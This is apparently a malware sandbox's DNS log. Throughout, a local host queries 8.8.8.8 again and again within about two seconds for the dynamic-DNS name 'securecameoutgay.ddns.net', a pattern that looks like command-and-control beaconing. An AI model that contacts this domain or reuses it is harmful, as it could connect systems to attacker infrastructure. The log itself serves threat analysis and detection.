                                                    Oct 12, 2024 23:05:11.003190994 CEST192.168.2.148.8.8.80xb8c1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.015281916 CEST192.168.2.148.8.8.80xb8c1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.028575897 CEST192.168.2.148.8.8.80xf565Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.044465065 CEST192.168.2.148.8.8.80xf565Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.052722931 CEST192.168.2.148.8.8.80xf565Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.062119961 CEST192.168.2.148.8.8.80xf565Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.072290897 CEST192.168.2.148.8.8.80xf565Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.081449986 CEST192.168.2.148.8.8.80x6fb4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.092108011 CEST192.168.2.148.8.8.80x6fb4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.101072073 CEST192.168.2.148.8.8.80x6fb4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.109669924 CEST192.168.2.148.8.8.80x6fb4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.119100094 CEST192.168.2.148.8.8.80x6fb4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.128637075 CEST192.168.2.148.8.8.80x56Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.138350010 CEST192.168.2.148.8.8.80x56Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.146873951 CEST192.168.2.148.8.8.80x56Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.154787064 CEST192.168.2.148.8.8.80x56Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.162760019 CEST192.168.2.148.8.8.80x56Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.172013044 CEST192.168.2.148.8.8.80x78c2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.180285931 CEST192.168.2.148.8.8.80x78c2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.194308043 CEST192.168.2.148.8.8.80x78c2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.205912113 CEST192.168.2.148.8.8.80x78c2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.220566034 CEST192.168.2.148.8.8.80x78c2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.243621111 CEST192.168.2.148.8.8.80xb606Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.263171911 CEST192.168.2.148.8.8.80xb606Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.274058104 CEST192.168.2.148.8.8.80xb606Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.299596071 CEST192.168.2.148.8.8.80xb606Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.386396885 CEST192.168.2.148.8.8.80xb606Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.462079048 CEST192.168.2.148.8.8.80x8183Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.471326113 CEST192.168.2.148.8.8.80x8183Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.480161905 CEST192.168.2.148.8.8.80x8183Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.493637085 CEST192.168.2.148.8.8.80x8183Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.502841949 CEST192.168.2.148.8.8.80x8183Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.514544010 CEST192.168.2.148.8.8.80xba8cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.523926973 CEST192.168.2.148.8.8.80xba8cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.539479017 CEST192.168.2.148.8.8.80xba8cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.547656059 CEST192.168.2.148.8.8.80xba8cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.562108040 CEST192.168.2.148.8.8.80xba8cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.573831081 CEST192.168.2.148.8.8.80xa0f5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.586743116 CEST192.168.2.148.8.8.80xa0f5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.602305889 CEST192.168.2.148.8.8.80xa0f5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.610992908 CEST192.168.2.148.8.8.80xa0f5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.620260954 CEST192.168.2.148.8.8.80xa0f5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.631757975 CEST192.168.2.148.8.8.80x5bfeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.639874935 CEST192.168.2.148.8.8.80x5bfeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.648313046 CEST192.168.2.148.8.8.80x5bfeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.656686068 CEST192.168.2.148.8.8.80x5bfeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.666137934 CEST192.168.2.148.8.8.80x5bfeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.677376986 CEST192.168.2.148.8.8.80x65a5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.686294079 CEST192.168.2.148.8.8.80x65a5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.695770979 CEST192.168.2.148.8.8.80x65a5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.704035997 CEST192.168.2.148.8.8.80x65a5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.712651968 CEST192.168.2.148.8.8.80x65a5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.725095987 CEST192.168.2.148.8.8.80x6685Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.734353065 CEST192.168.2.148.8.8.80x6685Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.742748022 CEST192.168.2.148.8.8.80x6685Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.751801968 CEST192.168.2.148.8.8.80x6685Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.759896994 CEST192.168.2.148.8.8.80x6685Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.770467997 CEST192.168.2.148.8.8.80x10bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.779200077 CEST192.168.2.148.8.8.80x10bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.787503958 CEST192.168.2.148.8.8.80x10bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.806262016 CEST192.168.2.148.8.8.80x10bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.817217112 CEST192.168.2.148.8.8.80x10bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.829011917 CEST192.168.2.148.8.8.80xac69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.838561058 CEST192.168.2.148.8.8.80xac69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.853030920 CEST192.168.2.148.8.8.80xac69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.862131119 CEST192.168.2.148.8.8.80xac69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.872203112 CEST192.168.2.148.8.8.80xac69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.888156891 CEST192.168.2.148.8.8.80x911aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.903563976 CEST192.168.2.148.8.8.80x911aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.916366100 CEST192.168.2.148.8.8.80x911aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.925932884 CEST192.168.2.148.8.8.80x911aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.934613943 CEST192.168.2.148.8.8.80x911aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.951294899 CEST192.168.2.148.8.8.80x9caStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.965749025 CEST192.168.2.148.8.8.80x9caStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.980004072 CEST192.168.2.148.8.8.80x9caStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.988671064 CEST192.168.2.148.8.8.80x9caStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:11.997642994 CEST192.168.2.148.8.8.80x9caStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.007261038 CEST192.168.2.148.8.8.80x7ca2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.030951023 CEST192.168.2.148.8.8.80x7ca2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.042309046 CEST192.168.2.148.8.8.80x7ca2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.053601027 CEST192.168.2.148.8.8.80x7ca2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.062556982 CEST192.168.2.148.8.8.80x7ca2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.074441910 CEST192.168.2.148.8.8.80x675fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.094187021 CEST192.168.2.148.8.8.80x675fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.102406979 CEST192.168.2.148.8.8.80x675fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.110591888 CEST192.168.2.148.8.8.80x675fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.118443966 CEST192.168.2.148.8.8.80x675fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.141170025 CEST192.168.2.148.8.8.80x71bbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.153043985 CEST192.168.2.148.8.8.80x71bbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.161983967 CEST192.168.2.148.8.8.80x71bbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.171214104 CEST192.168.2.148.8.8.80x71bbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.182971001 CEST192.168.2.148.8.8.80x71bbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.193542957 CEST192.168.2.148.8.8.80xa010Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.203486919 CEST192.168.2.148.8.8.80xa010Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.215403080 CEST192.168.2.148.8.8.80xa010Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.223535061 CEST192.168.2.148.8.8.80xa010Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.231723070 CEST192.168.2.148.8.8.80xa010Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.240823984 CEST192.168.2.148.8.8.80x862eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.248632908 CEST192.168.2.148.8.8.80x862eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.258111000 CEST192.168.2.148.8.8.80x862eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.266484022 CEST192.168.2.148.8.8.80x862eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.275074959 CEST192.168.2.148.8.8.80x862eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.284836054 CEST192.168.2.148.8.8.80x50eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.299631119 CEST192.168.2.148.8.8.80x50eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.307543039 CEST192.168.2.148.8.8.80x50eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.315965891 CEST192.168.2.148.8.8.80x50eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.324237108 CEST192.168.2.148.8.8.80x50eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.334084988 CEST192.168.2.148.8.8.80xafeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.344136000 CEST192.168.2.148.8.8.80xafeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.352224112 CEST192.168.2.148.8.8.80xafeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.361923933 CEST192.168.2.148.8.8.80xafeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.372492075 CEST192.168.2.148.8.8.80xafeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.384605885 CEST192.168.2.148.8.8.80xb7a4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.394896984 CEST192.168.2.148.8.8.80xb7a4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.404565096 CEST192.168.2.148.8.8.80xb7a4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.411966085 CEST192.168.2.148.8.8.80xb7a4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.419575930 CEST192.168.2.148.8.8.80xb7a4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.432404041 CEST192.168.2.148.8.8.80x3702Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.442297935 CEST192.168.2.148.8.8.80x3702Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.451738119 CEST192.168.2.148.8.8.80x3702Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.459598064 CEST192.168.2.148.8.8.80x3702Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.468534946 CEST192.168.2.148.8.8.80x3702Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.483736992 CEST192.168.2.148.8.8.80x4522Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.493341923 CEST192.168.2.148.8.8.80x4522Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.501583099 CEST192.168.2.148.8.8.80x4522Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.509521961 CEST192.168.2.148.8.8.80x4522Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.521173000 CEST192.168.2.148.8.8.80x4522Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.534842968 CEST192.168.2.148.8.8.80x4848Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.547494888 CEST192.168.2.148.8.8.80x4848Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.559503078 CEST192.168.2.148.8.8.80x4848Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.572244883 CEST192.168.2.148.8.8.80x4848Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.581882954 CEST192.168.2.148.8.8.80x4848Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.593816042 CEST192.168.2.148.8.8.80x5619Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.604051113 CEST192.168.2.148.8.8.80x5619Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.614407063 CEST192.168.2.148.8.8.80x5619Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.622612000 CEST192.168.2.148.8.8.80x5619Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.631194115 CEST192.168.2.148.8.8.80x5619Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.640590906 CEST192.168.2.148.8.8.80x936dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.651299953 CEST192.168.2.148.8.8.80x936dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.660074949 CEST192.168.2.148.8.8.80x936dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.669280052 CEST192.168.2.148.8.8.80x936dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.682774067 CEST192.168.2.148.8.8.80x936dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.693331003 CEST192.168.2.148.8.8.80xc95aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.702505112 CEST192.168.2.148.8.8.80xc95aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.711599112 CEST192.168.2.148.8.8.80xc95aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.722206116 CEST192.168.2.148.8.8.80xc95aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.734639883 CEST192.168.2.148.8.8.80xc95aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.745712996 CEST192.168.2.148.8.8.80xe2ebStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.756201029 CEST192.168.2.148.8.8.80xe2ebStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.769541979 CEST192.168.2.148.8.8.80xe2ebStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.782816887 CEST192.168.2.148.8.8.80xe2ebStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.792345047 CEST192.168.2.148.8.8.80xe2ebStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.803457975 CEST192.168.2.148.8.8.80xd118Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.813393116 CEST192.168.2.148.8.8.80xd118Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.822247028 CEST192.168.2.148.8.8.80xd118Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.830257893 CEST192.168.2.148.8.8.80xd118Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.838820934 CEST192.168.2.148.8.8.80xd118Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.849478960 CEST192.168.2.148.8.8.80xa2cfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.858987093 CEST192.168.2.148.8.8.80xa2cfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.869672060 CEST192.168.2.148.8.8.80xa2cfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.878006935 CEST192.168.2.148.8.8.80xa2cfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.885993958 CEST192.168.2.148.8.8.80xa2cfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.896313906 CEST192.168.2.148.8.8.80x4439Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.904947996 CEST192.168.2.148.8.8.80x4439Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.915221930 CEST192.168.2.148.8.8.80x4439Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.924267054 CEST192.168.2.148.8.8.80x4439Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.934392929 CEST192.168.2.148.8.8.80x4439Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.949843884 CEST192.168.2.148.8.8.80xb78dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.966298103 CEST192.168.2.148.8.8.80xb78dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.980959892 CEST192.168.2.148.8.8.80xb78dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.989191055 CEST192.168.2.148.8.8.80xb78dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:12.997837067 CEST192.168.2.148.8.8.80xb78dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.006763935 CEST192.168.2.148.8.8.80x5046Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.015398026 CEST192.168.2.148.8.8.80x5046Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.024177074 CEST192.168.2.148.8.8.80x5046Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.032282114 CEST192.168.2.148.8.8.80x5046Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.040613890 CEST192.168.2.148.8.8.80x5046Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.062441111 CEST192.168.2.148.8.8.80x81f2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.072468996 CEST192.168.2.148.8.8.80x81f2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.080697060 CEST192.168.2.148.8.8.80x81f2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.089025974 CEST192.168.2.148.8.8.80x81f2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.097086906 CEST192.168.2.148.8.8.80x81f2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.106632948 CEST192.168.2.148.8.8.80xf7e4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.115161896 CEST192.168.2.148.8.8.80xf7e4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.123734951 CEST192.168.2.148.8.8.80xf7e4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.132172108 CEST192.168.2.148.8.8.80xf7e4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.140297890 CEST192.168.2.148.8.8.80xf7e4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:13.149317026 CEST192.168.2.148.8.8.80x594aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
